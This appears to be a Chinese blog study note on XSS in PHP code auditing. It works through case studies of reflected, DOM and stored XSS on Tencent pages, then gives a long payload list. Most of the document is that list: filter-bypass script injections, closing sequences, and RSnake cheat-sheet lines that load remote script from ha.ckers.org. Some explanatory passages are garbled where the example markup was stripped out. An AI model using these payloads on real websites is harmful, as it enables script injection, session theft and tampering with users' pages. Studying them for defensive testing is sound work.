2020/1/29 PHP代码审计之进一步学习XSS【持续更新】

0x00

上午学习了XSS漏洞，中午吃饭想了想，还是思考的太浅层了，这种老生常谈的东西对于现在的我意义不大。现在我需要的是思考。于是就有了这个随笔。在本文中，我会持续更新一些XSS的深入思考，payload。以及一个XSS小游戏的通关过程。本文会随时持续更新，毕竟还有好多有趣的东西去学习呢233.

0x01 从乌云腾讯反射型XSS系列开始

案例一

1：前文提过，反射型xss中有输出会出现在HTML标签的属性之中。
但是基本不会有这种情况：

关键词：<input type="text" value="乌云欢迎您" />

如果这里的word没过滤双引号。就会有以下的情况发生。

http://xxxx.com/search.php?word=乌云欢迎您" onclick="alert(1)

对应的源代码如下：

<input type="text" value="乌云欢迎您" onclick="alert(1)" />

那么当用户点击这个文本框时，就会触发 alert(1) 。
但是过滤太简单了

将 " 过滤为 & quot; 就行。

<input type="text" value="乌云欢迎您&quot; onclick=&quot;alert(1)" />

过滤了“就可以了吗？
这里存在一个基于 css expression 的XSS 

css里面没有过滤  ，反斜线，
允许使用转义字符,  + ascii16进制形式。这样一来，我们就可以构造利用语句啦

例如 e 的 ascii 16进制是 65, 我们就写为 \65

expression ->  expr\65ssion。

案例二

缺陷代码：

<li><input type="text" id="pagenum"  class="inputstyle0814"  onkeydown="if ((event.keyCode==13) && (this.value!='')) location.href='http://stock.finance.qq.com/report/search.php?offset='+this.value+'&searchtype_yjbg=yjjg&searchvalue_yjbg=aaaaaaaaaa'"/></li>

在HTML属性中，会自动对实体字符进行转义。一个简单的比方。

   <img src="1" onerror="alert(1)">

   和

   <img src="1" onerror="alert(1)"> 

   是等效的

换言之，只要上面的情况，没有过滤 &，# 等符号，我们就可以写入任意字符。

JS部分我们可以做以下构造,由于'被过滤，我们可以将'写为 '

location.href='........&searchvalue_yjbg=aaaaaa'

location.href='........&searchvalue_yjbg=aaaaaa'+alert(1)+''

location.href='........&searchvalue_yjbg=aaaaaa'+alert(1)+''

接着我们把代码转换为 url 的编码。 &-> %26, # -> %23
绕过过滤

案例三 宽字节导致“闭合XSS

例子如下：

http://open.mail.qq.com/cgi-bin/qm_help_mailme?sid=,2,zh_CN&t=%22;alert(1);//aaaaaa

我们尝试注入 " 来闭合前面的双引号，但是很悲剧的是，双引号被过滤了。。

然后我们可以看到编码是：

<meta http-equiv="Content-Type" content="text/html; charset=gb18030" />

gbxxxx系列的编码，那么我们尝试一下宽字节呢？

http://open.mail.qq.com/cgi-bin/qm_help_mailme?sid=,2,zh_CN&t=%c0%22;alert(1);//aaaaaa

利用宽字节，成功弹窗。
至于这个漏洞的成因，和传统的宽字节漏洞并不一样。目测应该是由于过滤双引号的正则表达式写得有问题造成的。并不是因为%22变成了 %5c%22,而 %c0吃掉了后面的%5c。

案例四 在JS的注释里输出内容使得换行符导致XSS

简单来说就是代码在JS注释输出内容，我们可以在注释出插入payload 导致XSS。

//我是注释，我爱洗澡，哦～哦～哦～ [我是输出]

如果可以使用换行符的话。

//我是注释，我爱洗澡，哦～哦～哦～ [我是输出  换行符

 alert(1);//我是输出]

这样alert(1); 就会被成功执行。

0x02 从乌云腾讯Dom型XSS系列开始

Dom Xss相比反射型XSS，脑袋需要多思考一层。 也就是说，我们关注的不仅是【输出】了什么，还要了解这个页面里，【javascript】拿这个【输出】干了什么。 为了循序渐进，本例讲到的是，【输出】直接在源代码可见的情况。

1. 在学习Dom Xss之前，先来补习点 html, js 的基础知识。

进一步，我们的 yyyyyy ，还可以是 HTML代码

再进一步， JS的字符串中的字符可以写为 unicode编码
譬如： < 可以表示为 \u003c , > 可以表示为 \u003e
有时过滤的实际上是\u003c和\u003e，但是并没有过滤\u0020

其实呢，在JS字符串里， < 不光可以写为 \u003c，还可以写为 \x3c， > 同样可以写为 \x3e。

本例中是 innerHTML的情况。
实际上只要是与改变页面HTML内容相关的操作，都可能导致这种问题。
这也是网上介绍dom xss时，也经常会提到的东西，
比如document.getElementById("y").innerHTML="xxxxxxxxxx";
document.write("xxxxxxxxxxxx");
还有一些网站，使用了第三方的JS库，譬如jQuery时，会有
$("#y").html("xxxxxxx");

 当然最后，还需要提到一些需要注意的地方。

aa.innerHTML="xxxxxxxxxxxx";

这种情况下。xxxxx只能使用 这种方式来触发JS。

而不能以 来触发，因为这种压根不会执行之间的内容。 IE下，可以使用 。

案例一 善变iframe

有时候，输出还会出现在 。 iframe 的 src属性本来应该是一个网址，但是iframe之善变，使得它同样可以执行javascript，而且可以用不同的姿势来执行。这一类问题，我将其归为[路径可控]问题。当然上面说到的是普通的反射型XSS。有时候程序员会使用javascript来动态的改变iframe的src属性，譬如：iframeA.src="[可控的url]"; 同样会导致XSS问题。

1. 先来说说iframe的变化。

1.1 最好懂的，onload执行js

<iframe onload="alert(1)"></iframe>

1.2 src 执行javascript代码

<iframe src="javascript:alert(1)"></iframe>

1.3 IE下vbscript执行代码

<iframe src="vbscript:msgbox(1)"></iframe>
`

1.4 Chrome下data协议执行代码
`
<iframe src="data:text/html,<script>alert(1)</script>"></iframe> Chrome

1.5 上面的变体

<iframe src="data:text/html,&lt;script&gt;alert(1)&lt;/script&gt;"></iframe>

1.6 Chrome下srcdoc属性

<iframe srcdoc="&lt;script&gt;alert(1)&lt;/script&gt;"></iframe>

0x03  XSS过滤器绕过 [通用绕过]

1.其实就是个普通的XSS点，uin参数没有对任何字符进行过滤。

`
http://bangbang.qq.com/php/login?game=roco&uin=">&world=5&roleid=44583443&level=8&role=%2

2. 正是由于这个点什么都没过滤，浏览器自身的防御机制也最好发挥作用，瞧瞧，chrome拦截了。

可以看到上面的要求均满足。我们就可以使用以下技巧。

标签。 我们看看当前的这个点的代码。

">

0x04 存储型XSS入门 [什么都没过滤的情况]

存储型和反射型相比，只是多了输入存储、输出取出的过程。简单点说：

反射型是：输入--输出；
存储型是：输入--进入数据库*--取出数据库--输出。

这样一来，大家应该注意到以下差别：

反射型是：绝大部分情况下，输入在哪里，输出就在哪里。
存储型是：输入在A处进入数据库， 而输出则可能出现在其它任何用到数据的地方。

反射型是：输入大部分位于地址栏或来自DOM的某些属性，也会偶尔有数据在请求中（POST类型）
存储型是：输入大部分来自POST/GET请求，常见于一些保存操作中。

因而我们找存储型的时候，从一个地方输入数据，需要检测很多输出的点，从而可能会在很多点发现存储型XSS。

至于如何根据输出来构建存储型XSS的代码，和反射型没有任何区别，都是看输出的上下文来进行。

从程序员过滤代码的角度来讲，我们给之后的教程走向分个类：

1. 数据需要过滤，但是未过滤。导致XSS。

比如：昵称、个人资料。

1. 业务需求使得数据只能部分过滤，但过滤规则不完善，被绕过后导致XSS。

比如：日志、邮件及其它富文本应用。

本节先看一个最基本的情况，该过滤，但是什么都没过滤的情况。

---

（数据库：不一定是像mysql那样的数据库，只要是能存储数据的都算。）

很多新手在找XSS的时候，都是拿着或者其它到处测试，很盲目不是吗？

一定要记住
存储型XSS，输出的位置不一定出现在输入的位置。

因而我们有时候需要逆向的思维，来寻找存储型XSS。 大概思路如下：

先找到输出点，然后猜测此处输出是否会被过滤。

 如果觉得可能没过滤，我们再找到这个输出是在哪里输入的。

接着开始测试输入，看输出的效果。

如果没过滤，那么你就成功了，否则你可以放弃掉它。
案例一：存储型XSS入门 [套现绕过富文本]
很多应用含有富文本内容，这类应用最典型的特征是具有编辑器，例如：博客日志，邮箱等。这类应用往往允许使用一定的HTML代码。为了在用户体验和安全之间寻找平衡，各种厂商可能采用了不尽相同的办法。但是总体来说，有2类。

第1类我们称为白名单，即：只允许使用白名单内的合法HTML标签，例如IMG。其它均剔除。例如：百度贴吧回帖时候的代码过滤方式。
第2类我们称为黑名单，即：厂商会构建一个有危害的HTML标签、属性列表，然后通过分析用户提交的HTML代码，剔除其中有害的部分。 如：QQ邮箱的发邮件时的过滤方式。

白名单要安全得多，而黑名单的方式则经常会被绕过。

绕过的技巧也有很多，我们可以从最没技术含量的开始说起!! 本节将以QQ空间/QQ校友的日志功能为例来说明，什么是“套现绕过富文本”！

注意：本节说的“套现”，不是与“钱”有关的；在这里的含义是：“套用现成的XSS代码”。

0x05 一些payload以及tips

<script>alert('XSS')</script>
<script>alert('Zer0Lulz')</script>
<script>prompt('XSS')</script>
<script>prompt('Zer0Lulz')</script>

<script>alert('Zer0Lulz')</script>
<ScRiPt>AlErT('XSS')</ScRiPt>
"><script>alert('XSS')</script>
"><ScRiPt>AlErT('XSS')</ScRiPt>
=><><script>alert('XSS')</script>
=><><ScRiPt>AlErT('XSS')</ScRiPt>
="><script>alert('XSS')</script>
="><ScRiPt>AlErT('XSS')</ScRiPt>
='><script>alert('XSS')</script>
='><ScRiPt>AlErT('XSS')</ScRiPt>
="><<script>alert('XSS')</script>
="><<ScRiPt>AlErT('XSS')</ScRiPt>
='><<script>alert('XSS')</script>
='><<ScRiPt>AlErT('XSS')</ScRiPt>
<script>alert(String.fromCharCode(88, 83, 83)</script>
<ScRiPt>AlErT(String.fromCharCode(88, 83, 83)</ScRiPt>
"><script>alert(String.fromCharCode(88, 83, 83)</script>
"><ScRiPt>AlErT(String.fromCharCode(88, 83, 83)</ScRiPt>
=><><script>alert(String.fromCharCode(88, 83, 83)</script>
=><><ScRiPt>AlErT(String.fromCharCode(88, 83, 83)</ScRiPt>
="><script>alert(String.fromCharCode(88, 83, 83)</script>
="><ScRiPt>AlErT(String.fromCharCode(88, 83, 83)</ScRiPt>
='><script>alert(String.fromCharCode(88, 83, 83)</script>
='><ScRiPt>AlErT(String.fromCharCode(88, 83, 83)</ScRiPt>
="><<script>alert(String.fromCharCode(88, 83, 83)</script>
="><<ScRiPt>AlErT(String.fromCharCode(88, 83, 83)</ScRiPt>
='><<script>alert(String.fromCharCode(88, 83, 83)</script>
='><<ScRiPt>AlErT(String.fromCharCode(88, 83, 83)</ScRiPt>
"%3e%3cscript%3ealert('XSS')%3c%2fscript%3e
"%3e%3cScRiPt%3eAlErT('XSS')%3c%2fScRiPt%3e
=%3e%3c%3e%3cscript>alert('XSS')%3c%2fscript%3e
=%3e%3c%3e%3cScRiPt>AlErT('XSS')%3c%2fScRiPt%3e
="%3e%3cscript%3ealert('XSS')%3c%2fscript%3e
="%3e%3cScRiPt%3eAlErT('XSS')%3c%2fScRiPt%3e
='%3e%3cscript%3ealert('XSS')%3c%2fscript%3e
='%3e%3cScRiPt%3eAlErT('XSS')%3c%2fScRiPt%3e
="%3e%3c%3cscript%3ealert('XSS')%3c%2fscript%3e
="%3e%3c%3cScRiPt%3eAlErT('XSS')%3c%2fScRiPt%3e
='%3e%3c%3cscript%3ealert('XSS')%3c%2fscript%3e
='%3e%3c%3cScRiPt%3eAlErT('XSS')%3c%2fScRiPt%3e
\\><script>alert('XSS')</script>
\\><ScRiPt>AlErT('XSS')</ScRiPt>
=><><script>alert('XSS')</script>
=><><ScRiPt>AlErT('XSS')</ScRiPt>
=\\><script>alert('XSS')</script>
=\\><ScRiPt>AlErT('XSS')</ScRiPt>
=\><script>alert('XSS')</script>
=\><ScRiPt>AlErT('XSS')</ScRiPt>
=\\><<script>alert('XSS')</script>
=\\><<ScRiPt>AlErT('XSS')</ScRiPt>
=\><<script>alert('XSS')</script>
=\><<ScRiPt>AlErT('XSS')</ScRiPt>
"%3e%3cscript%3ealert(String.fromCharCode(88, 83, 83)%3c%2fscript%3e
"%3e%3cScRiPt%3eAlErT(String.fromCharCode(88, 83, 83)%3c%2fScRiPt%3e
=%3e%3c%3e%3cscript>alert(String.fromCharCode(88, 83, 83)%3c%2fscript%3e
=%3e%3c%3e%3cScRiPt>AlErT(String.fromCharCode(88, 83, 83)%3c%2fScRiPt%3e
="%3e%3cscript%3ealert(String.fromCharCode(88, 83, 83)%3c%2fscript%3e
="%3e%3cScRiPt%3eAlErT(String.fromCharCode(88, 83, 83)%3c%2fScRiPt%3e
='%3e%3cscript%3ealert(String.fromCharCode(88, 83, 83)%3c%2fscript%3e
='%3e%3cScRiPt%3eAlErT(String.fromCharCode(88, 83, 83)%3c%2fScRiPt%3e
="%3e%3c%3cscript%3ealert(String.fromCharCode(88, 83, 83)%3c%2fscript%3e
="%3e%3c%3cScRiPt%3eAlErT(String.fromCharCode(88, 83, 83)%3c%2fScRiPt%3e
='%3e%3c%3cscript%3ealert(String.fromCharCode(88, 83, 83)%3c%2fscript%3e
='%3e%3c%3cScRiPt%3eAlErT(String.fromCharCode(88, 83, 83)%3c%2fScRiPt%3e
\\><script>alert(String.fromCharCode(88, 83, 83)</script>
\\><ScRiPt>AlErT(String.fromCharCode(88, 83, 83)</ScRiPt>
=><><script>alert(String.fromCharCode(88, 83, 83)</script>
=><><ScRiPt>AlErT(String.fromCharCode(88, 83, 83)</ScRiPt>
=\\><script>alert(String.fromCharCode(88, 83, 83)</script>
=\\><ScRiPt>AlErT(String.fromCharCode(88, 83, 83)</ScRiPt>
=\><script>alert(String.fromCharCode(88, 83, 83)</script>
=\><ScRiPt>AlErT(String.fromCharCode(88, 83, 83)</ScRiPt>
=\\><<script>alert(String.fromCharCode(88, 83, 83)</script>
=\\><<ScRiPt>AlErT(String.fromCharCode(88, 83, 83)</ScRiPt>
=\><<script>alert(String.fromCharCode(88, 83, 83)</script>
=\><<ScRiPt>AlErT(String.fromCharCode(88, 83, 83)</ScRiPt>
%5c%5c%3e%3cscript%3ealert(%5cXSS%5c)%3c%2fscript%3e
%5c%5c%3e%3cScRiPt%3eAlErT(%5cXSS%5c)%3c%2fScRiPt%3e
=%3e%3c%3e%3cscript%3ealert(%5cXSS%5c)%3c%2fscript%3e
=%3e%3c%3e%3cScRiPt%3eAlErT(%5cXSS%5c)%3c%2fScRiPt%3e
=%5c%5c%3e%3cscript%3ealert(%5cXSS%5c)%3c%2fscript%3e
=%5c%5c%3e%3cScRiPt%3eAlErT(%5cXSS%5c)%3c%2fScRiPt%3e
=%5c%3e%3cscript%3ealert(%5cXSS%5c)%3c%2fscript%3e
=%5c%3e%3cScRiPt%3eAlErT(%5cXSS%5c)%3c%2fScRiPt%3e
=%5c%5c%3e%3c%3cscript%3ealert(%5cXSS%5c)%3c%2fscript%3e
=%5c%5c%3e%3c%3cScRiPt%3eAlErT(%5cXSS%5c)%3c%2fScRiPt%3e
=%5c%3e%3c%3cscript%3ealert(%5cXSS%5c)%3c%2fscript%3e
=%5c%3e%3c%3cScRiPt%3eAlErT(%5cXSS%5c)%3c%2fScRiPt%3e
%5c%5c%3e%3cscript%3ealert(String.fromCharCode(88, 83, 83)%3c%2fscript%3e
%5c%5c%3e%3cScRiPt%3eAlErT(String.fromCharCode(88, 83, 83)%3c%2fScRiPt%3e
=%3e%3c%3e%3cscript%3ealert(String.fromCharCode(88, 83, 83)%3c%2fscript%3e
=%3e%3c%3e%3cScRiPt%3eAlErT(String.fromCharCode(88, 83, 83)%3c%2fScRiPt%3e
=%5c%5c%3e%3cscript%3ealert(String.fromCharCode(88, 83, 83)%3c%2fscript%3e
=%5c%5c%3e%3cScRiPt%3eAlErT(String.fromCharCode(88, 83, 83)%3c%2fScRiPt%3e
=%5c%3e%3cscript%3ealert(String.fromCharCode(88, 83, 83)%3c%2fscript%3e
=%5c%3e%3cScRiPt%3eAlErT(String.fromCharCode(88, 83, 83)%3c%2fScRiPt%3e
=%5c%5c%3e%3c%3cscript%3ealert(String.fromCharCode(88, 83, 83)%3c%2fscript%3e
=%5c%5c%3e%3c%3cScRiPt%3eAlErT(String.fromCharCode(88, 83, 83)%3c%2fScRiPt%3e
=%5c%3e%3c%3cscript%3ealert(String.fromCharCode(88, 83, 83)%3c%2fscript%3e
=%5c%3e%3c%3cScRiPt%3eAlErT(String.fromCharCode(88, 83, 83)%3c%2fScRiPt%3e
<script>prompt('Zer0Lulz')</script>
<ScRiPt>PrOmPt('XSS')</ScRiPt>
"><script>prompt('XSS')</script>
"><ScRiPt>PrOmPt('XSS')</ScRiPt>
=><><script>prompt('XSS')</script>
=><><ScRiPt>PrOmPt('XSS')</ScRiPt>
="><script>prompt('XSS')</script>
="><ScRiPt>PrOmPt('XSS')</ScRiPt>
='><script>prompt('XSS')</script>
='><ScRiPt>PrOmPt('XSS')</ScRiPt>
="><<script>prompt('XSS')</script>
="><<ScRiPt>PrOmPt('XSS')</ScRiPt>
='><<script>prompt('XSS')</script>
='><<ScRiPt>PrOmPt('XSS')</ScRiPt>
<script>prompt(String.fromCharCode(88, 83, 83)</script>
<ScRiPt>PrOmPt(String.fromCharCode(88, 83, 83)</ScRiPt>
"><script>prompt(String.fromCharCode(88, 83, 83)</script>
"><ScRiPt>PrOmPt(String.fromCharCode(88, 83, 83)</ScRiPt>
=><><script>prompt(String.fromCharCode(88, 83, 83)</script>
=><><ScRiPt>PrOmPt(String.fromCharCode(88, 83, 83)</ScRiPt>
="><script>prompt(String.fromCharCode(88, 83, 83)</script>
="><ScRiPt>PrOmPt(String.fromCharCode(88, 83, 83)</ScRiPt>
='><script>prompt(String.fromCharCode(88, 83, 83)</script>
='><ScRiPt>PrOmPt(String.fromCharCode(88, 83, 83)</ScRiPt>
="><<script>prompt(String.fromCharCode(88, 83, 83)</script>
="><<ScRiPt>PrOmPt(String.fromCharCode(88, 83, 83)</ScRiPt>
='><<script>prompt(String.fromCharCode(88, 83, 83)</script>
='><<ScRiPt>PrOmPt(String.fromCharCode(88, 83, 83)</ScRiPt>
"%3e%3cscript%3eprompt('XSS')%3c%2fscript%3e
"%3e%3cScRiPt%3ePrOmPt('XSS')%3c%2fScRiPt%3e
=%3e%3c%3e%3cscript>prompt('XSS')%3c%2fscript%3e
=%3e%3c%3e%3cScRiPt>PrOmPt('XSS')%3c%2fScRiPt%3e
="%3e%3cscript%3eprompt('XSS')%3c%2fscript%3e
="%3e%3cScRiPt%3ePrOmPt('XSS')%3c%2fScRiPt%3e
='%3e%3cscript%3eprompt('XSS')%3c%2fscript%3e
='%3e%3cScRiPt%3ePrOmPt('XSS')%3c%2fScRiPt%3e
="%3e%3c%3cscript%3eprompt('XSS')%3c%2fscript%3e
="%3e%3c%3cScRiPt%3ePrOmPt('XSS')%3c%2fScRiPt%3e
='%3e%3c%3cscript%3eprompt('XSS')%3c%2fscript%3e
='%3e%3c%3cScRiPt%3ePrOmPt('XSS')%3c%2fScRiPt%3e
\\><script>prompt('XSS')</script>
\\><ScRiPt>PrOmPt('XSS')</ScRiPt>
=><><script>prompt('XSS')</script>
=><><ScRiPt>PrOmPt('XSS')</ScRiPt>
=\\><script>prompt('XSS')</script>
=\\><ScRiPt>PrOmPt('XSS')</ScRiPt>
=\><script>prompt('XSS')</script>
=\><ScRiPt>PrOmPt('XSS')</ScRiPt>
=\\><<script>prompt('XSS')</script>
=\\><<ScRiPt>PrOmPt('XSS')</ScRiPt>
=\><<script>prompt('XSS')</script>
=\><<ScRiPt>PrOmPt('XSS')</ScRiPt>
"%3e%3cscript%3eprompt(String.fromCharCode(88, 83, 83)%3c%2fscript%3e
"%3e%3cScRiPt%3ePrOmPt(String.fromCharCode(88, 83, 83)%3c%2fScRiPt%3e
=%3e%3c%3e%3cscript>prompt(String.fromCharCode(88, 83, 83)%3c%2fscript%3e
=%3e%3c%3e%3cScRiPt>PrOmPt(String.fromCharCode(88, 83, 83)%3c%2fScRiPt%3e
="%3e%3cscript%3eprompt(String.fromCharCode(88, 83, 83)%3c%2fscript%3e
="%3e%3cScRiPt%3ePrOmPt(String.fromCharCode(88, 83, 83)%3c%2fScRiPt%3e
='%3e%3cscript%3eprompt(String.fromCharCode(88, 83, 83)%3c%2fscript%3e
='%3e%3cScRiPt%3ePrOmPt(String.fromCharCode(88, 83, 83)%3c%2fScRiPt%3e
="%3e%3c%3cscript%3eprompt(String.fromCharCode(88, 83, 83)%3c%2fscript%3e
="%3e%3c%3cScRiPt%3ePrOmPt(String.fromCharCode(88, 83, 83)%3c%2fScRiPt%3e
='%3e%3c%3cscript%3eprompt(String.fromCharCode(88, 83, 83)%3c%2fscript%3e
='%3e%3c%3cScRiPt%3ePrOmPt(String.fromCharCode(88, 83, 83)%3c%2fScRiPt%3e
\\><script>prompt(String.fromCharCode(88, 83, 83)</script>
\\><ScRiPt>PrOmPt(String.fromCharCode(88, 83, 83)</ScRiPt>
=><><script>prompt(String.fromCharCode(88, 83, 83)</script>
=><><ScRiPt>PrOmPt(String.fromCharCode(88, 83, 83)</ScRiPt>
=\\><script>prompt(String.fromCharCode(88, 83, 83)</script>
=\\><ScRiPt>PrOmPt(String.fromCharCode(88, 83, 83)</ScRiPt>
=\><script>prompt(String.fromCharCode(88, 83, 83)</script>
=\><ScRiPt>PrOmPt(String.fromCharCode(88, 83, 83)</ScRiPt>
=\\><<script>prompt(String.fromCharCode(88, 83, 83)</script>
=\\><<ScRiPt>PrOmPt(String.fromCharCode(88, 83, 83)</ScRiPt>
=\><<script>prompt(String.fromCharCode(88, 83, 83)</script>
=\><<ScRiPt>PrOmPt(String.fromCharCode(88, 83, 83)</ScRiPt>
%5c%5c%3e%3cscript%3eprompt(%5cXSS%5c)%3c%2fscript%3e
%5c%5c%3e%3cScRiPt%3ePrOmPt(%5cXSS%5c)%3c%2fScRiPt%3e
=%3e%3c%3e%3cscript%3eprompt(%5cXSS%5c)%3c%2fscript%3e
=%3e%3c%3e%3cScRiPt%3ePrOmPt(%5cXSS%5c)%3c%2fScRiPt%3e
=%5c%5c%3e%3cscript%3eprompt(%5cXSS%5c)%3c%2fscript%3e
=%5c%5c%3e%3cScRiPt%3ePrOmPt(%5cXSS%5c)%3c%2fScRiPt%3e
=%5c%3e%3cscript%3eprompt(%5cXSS%5c)%3c%2fscript%3e
=%5c%3e%3cScRiPt%3ePrOmPt(%5cXSS%5c)%3c%2fScRiPt%3e
=%5c%5c%3e%3c%3cscript%3eprompt(%5cXSS%5c)%3c%2fscript%3e
=%5c%5c%3e%3c%3cScRiPt%3ePrOmPt(%5cXSS%5c)%3c%2fScRiPt%3e
=%5c%3e%3c%3cscript%3eprompt(%5cXSS%5c)%3c%2fscript%3e
=%5c%3e%3c%3cScRiPt%3ePrOmPt(%5cXSS%5c)%3c%2fScRiPt%3e
%5c%5c%3e%3cscript%3eprompt(String.fromCharCode(88, 83, 83)%3c%2fscript%3e
%5c%5c%3e%3cScRiPt%3ePrOmPt(String.fromCharCode(88, 83, 83)%3c%2fScRiPt%3e
=%3e%3c%3e%3cscript%3eprompt(String.fromCharCode(88, 83, 83)%3c%2fscript%3e
=%3e%3c%3e%3cScRiPt%3ePrOmPt(String.fromCharCode(88, 83, 83)%3c%2fScRiPt%3e
=%5c%5c%3e%3cscript%3eprompt(String.fromCharCode(88, 83, 83)%3c%2fscript%3e
=%5c%5c%3e%3cScRiPt%3ePrOmPt(String.fromCharCode(88, 83, 83)%3c%2fScRiPt%3e
=%5c%3e%3cscript%3eprompt(String.fromCharCode(88, 83, 83)%3c%2fscript%3e
=%5c%3e%3cScRiPt%3ePrOmPt(String.fromCharCode(88, 83, 83)%3c%2fScRiPt%3e
=%5c%5c%3e%3c%3cscript%3eprompt(String.fromCharCode(88, 83, 83)%3c%2fscript%3e
=%5c%5c%3e%3c%3cScRiPt%3ePrOmPt(String.fromCharCode(88, 83, 83)%3c%2fScRiPt%3e
=%5c%3e%3c%3cscript%3eprompt(String.fromCharCode(88, 83, 83)%3c%2fscript%3e
=%5c%3e%3c%3cScRiPt%3ePrOmPt(String.fromCharCode(88, 83, 83)%3c%2fScRiPt%3e

//闭合方法

>
">
'>
./
.\
\/
>>
>>'>
><">
'>>
">>
'>'>
">">
')
")
'')
')')
"))
"")
")")
''/
""/
'/'/
"/"/
''\
'\'\
"\"\
""\

# credit to rsnake
<SCRIPT>alert('XSS');</SCRIPT>
'';!--"<XSS>=&{()}
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=JaVaScRiPt:alert('XSS')>
<IMG SRC=javascript:alert(&quot;XSS&quot;)>
<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
SRC=&#10<IMG 6;avascript:alert('XSS')>
<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>
<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
<IMG SRC="jav   ascript:alert('XSS');">
<IMG SRC="jav	ascript:alert('XSS');">
<IMG SRC="jav
ascript:alert('XSS');">
<IMG SRC="jav
ascript:alert('XSS');">
<IMG SRC=" &#14;  javascript:alert('XSS');">
<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT SRC=http://ha.ckers.org/xss.js?<B>
<IMG SRC="javascript:alert('XSS')"
<SCRIPT>a=/XSS/
\";alert('XSS');//
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
<BODY BACKGROUND="javascript:alert('XSS')">
<BODY ONLOAD=alert('XSS')>
<IMG DYNSRC="javascript:alert('XSS')">
<IMG LOWSRC="javascript:alert('XSS')">
<BGSOUND SRC="javascript:alert('XSS');">
<BR SIZE="&{alert('XSS')}">
<LAYER SRC="http://ha.ckers.org/scriptlet.html"></LAYER>
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">
<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>
<META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet">
<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE>
<IMG SRC='vbscript:msgbox("XSS")'>
<IMG SRC="mocha:[code]">
<IMG SRC="livescript:[code]">
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
<META HTTP-EQUIV="Link" Content="<javascript:alert('XSS')>; REL=stylesheet">
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
<TABLE BACKGROUND="javascript:alert('XSS')">
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
<DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))">
<DIV STYLE="width: expression(alert('XSS'));">
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
<XSS STYLE="xss:expression(alert('XSS'))">
exp/*<XSS STYLE='no\xss:noxss("*//*");
<STYLE TYPE="text/javascript">alert('XSS');</STYLE>
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
<BASE HREF="javascript:alert('XSS');//">
<OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT>
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT>
getURL("javascript:alert('XSS')")
a="get";
<!--<value><![CDATA[<XML ID=I><X><C><![CDATA[<IMG SRC="javas<![CDATA[cript:alert('XSS');">
<XML SRC="http://ha.ckers.org/xsstest.xml" ID=I></XML>
<HTML><BODY>
<SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT>
<!--#exec cmd="/bin/echo '<SCRIPT SRC'"--><!--#exec cmd="/bin/echo '=http://ha.ckers.org/xss.js></SCRIPT>'"-->
<? echo('<SCR)';
<META HTTP-EQUIV="Set-Cookie" Content="USERID=&lt;SCRIPT&gt;alert('XSS')&lt;/SCRIPT&gt;">
<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>

')alert('xss');
");alert('xss');

XSS DETECTED by HR

.html

<0x736372697074>alert('XSS')</0x736372697074>
<char(115,99,114,105,112,116)>alert('XSS')</char(115,99,114,105,112,116)>
<0x736372697074>alert(String.fromCharCode(88, 83, 83))</0x736372697074>
<char(115,99,114,105,112,116)>alert(String.fromCharCode(88, 83, 83))</char(115,99,114,105,112,116)>

">

XSS DETECTED by HR

.html
">
">
"><0x736372697074>alert('XSS')</0x736372697074>
"><char(115,99,114,105,112,116)>alert('XSS')</char(115,99,114,105,112,116)>
"><0x736372697074>alert(String.fromCharCode(88, 83, 83))</0x736372697074>
"><char(115,99,114,105,112,116)>alert(String.fromCharCode(88, 83, 83))</char(115,99,114,105,112,116)>
">
%22%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%27%58%53%53%27%29%3C%2F%73%63%72%69%70%74%3E
"><script>alert('XSS')</script>
&#34&#62&#60&#115&#99&#114&#105&#112&#116&#62&#97&#108&#101&#114&#116&#40&#39&#88&#83&#83&#39&#41&#60&#47&#115&#99&#114&#105&#112&#116&#62
